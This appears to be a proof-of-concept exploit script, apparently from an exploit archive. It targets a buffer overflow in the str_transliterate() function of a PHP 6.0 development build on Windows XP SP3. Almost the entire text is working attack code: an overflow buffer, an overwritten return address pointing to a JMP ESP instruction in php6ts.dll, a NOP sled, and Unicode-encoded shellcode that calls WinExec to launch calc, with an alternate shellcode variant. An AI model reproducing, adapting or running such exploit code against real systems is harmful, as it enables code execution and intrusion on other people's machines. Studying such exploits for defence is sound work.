<?php error_reporting(0); ##################################################################### ## PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit ## Tested on WIN XP HEB SP3, Apache, PHP 6.0 Dev ## Buffer Overflow ## Bug discovered by Pr0T3cT10n, <pr0t3ct10n@gmail.com> ## Exploited by TheLeader, Debug ## SP. Thanks: HDM ## http://www.nullbyte.org.il ##################################################################### ## This code should exploits a buffer overflow in the str_transliterate() function to call WinExec and execute CALC ## Take a look, 'unicode.semantics' has to be on! ## php.ini > unicode.semantics = on ##################################################################### if(ini_get_bool('unicode.semantics')) { $buff = str_repeat("\u4141", 256); $eip = "\u1445\u10A9"; # 0x10A91445 JMP ESP @ php6ts.dll $nops = str_repeat("\u9090", 20);
# WinExec Calc XP SP3 HEB Unicode-encoded shellcode $shellcode = "\u02EB\u05EB\uF9E8\uFFFF\u33FF\u5BC0\u4388\u8315\u11C3\uBB53\u250D\u7C86\uD3FF\u6163\u636C\u414E"; # WinExec Calc XP SP3 EN Unicode-encoded shellcode (added by muts) # $shellcode = "\u02EB\u05EB\uF9E8\uFFFF\u33FF\u5BC0\u4388\u8315\u11C3\uBB53\u23AD\u7C86\uD3FF\u6163\u636C\u414E"; $exploit = $buff.$eip.$nops.$shellcode; str_transliterate(0, $exploit, 0); } else { exit("Error! 'unicode.semantics' has be on!\r\n"); }
function ini_get_bool($a) { $b = ini_get($a); switch (strtolower($b)) { case 'on': case 'yes': case 'true': return 'assert.active' !== $a; case 'stdout': case 'stderr': return 'display_errors' === $a; default: return (bool) (int) $b; } } ?>
|